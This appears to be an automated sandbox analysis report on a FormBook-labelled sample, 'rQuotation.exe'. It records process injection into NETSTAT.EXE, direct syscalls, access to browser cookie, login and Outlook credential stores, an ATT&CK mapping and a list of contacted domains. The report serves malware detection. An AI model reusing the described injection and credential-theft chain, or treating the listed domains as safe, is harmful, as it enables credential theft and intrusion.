              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702750 mov eax, dword ptr fs:[00000030h]0_2_01702750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702750 mov eax, dword ptr fs:[00000030h]0_2_01702750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01744755 mov eax, dword ptr fs:[00000030h]0_2_01744755
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov esi, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov eax, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov eax, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E75D mov eax, dword ptr fs:[00000030h]0_2_0174E75D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0750 mov eax, dword ptr fs:[00000030h]0_2_016C0750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173C730 mov eax, dword ptr fs:[00000030h]0_2_0173C730
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC720 mov eax, dword ptr fs:[00000030h]0_2_016FC720
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC720 mov eax, dword ptr fs:[00000030h]0_2_016FC720
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov eax, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov ecx, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov eax, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC700 mov eax, dword ptr fs:[00000030h]0_2_016FC700
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0710 mov eax, dword ptr fs:[00000030h]0_2_016C0710
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0710 mov eax, dword ptr fs:[00000030h]0_2_016F0710
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E7E1 mov eax, dword ptr fs:[00000030h]0_2_0174E7E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C47FB mov eax, dword ptr fs:[00000030h]0_2_016C47FB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C47FB mov eax, dword ptr fs:[00000030h]0_2_016C47FB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CC7C0 mov eax, dword ptr fs:[00000030h]0_2_016CC7C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017407C3 mov eax, dword ptr fs:[00000030h]0_2_017407C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C07AF mov eax, dword ptr fs:[00000030h]0_2_016C07AF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017747A0 mov eax, dword ptr fs:[00000030h]0_2_017747A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176678E mov eax, dword ptr fs:[00000030h]0_2_0176678E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA660 mov eax, dword ptr fs:[00000030h]0_2_016FA660
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA660 mov eax, dword ptr fs:[00000030h]0_2_016FA660

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtSetInformationThread: Direct from: 0x76EF63F9
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtTerminateThread: Direct from: 0x76F02FCC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe NtCreateUserProcess: Direct from: 0x76F0371C
              Source: C:\Users\user\Desktop\rQuotation.exe Section loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\rQuotation.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: read write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 8036
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread APC queued: target process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager

              Stealing of Sensitive Information

              Source: Yara match File source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

Source: Yara match, File source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 1 System Network Connections Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior graph (ID: 1579601, Sample: rQuotation.exe, Start date: 23/12/2024, Architecture: WINDOWS, Score: 100). Process chain: rQuotation.exe (started; maps a DLL or memory area into another process) -> gAmAZOKQyy.exe (injected; found direct / indirect syscall) -> NETSTAT.EXE (started; tries to steal mail credentials, tries to harvest and steal browser information, modifies the context of a thread in another process, 3 other signatures) -> gAmAZOKQyy.exe (injected; found direct / indirect syscall, contacts external domains and IPs) and firefox.exe (started).

Source | Detection | Scanner | Label | Link
rQuotation.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook |
rQuotation.exe | 79% | Virustotal | | Browse
rQuotation.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
rQuotation.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
                                                                                                                                                    unknown
                                                                                                                                                    http://www.thetrees.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.cryptomastery.netgAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://wws.rvrktllmcvl.com/lfp/44.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://wwf.yelangzhibo.top/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.seamarket.shopgAmAZOKQyy.exe, 00000006.00000002.3574569506.000000000554D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.vetcbd.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.xiangxiangzhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.xiyezhibo.com/bindingNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://wwh.tianshizhibo.top/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.mirenzhibo.net/agpez/45.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.propertyadvice.netgAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.zixiuzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.mirenzhibo.net/j/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://m.cckx.com.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://www.mirenzhibo.net/ibsg/7132.html:;NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.mirenzhibo.net/imw/8.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.qingjiezhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.qigezhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.eurosupport.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.ideasforlife.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.meikazhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://www.mirenzhibo.net/b/5851.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.mirenzhibo.net/uenlb/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://wwd.shibazhibo.top/l/24.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://www.babazhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
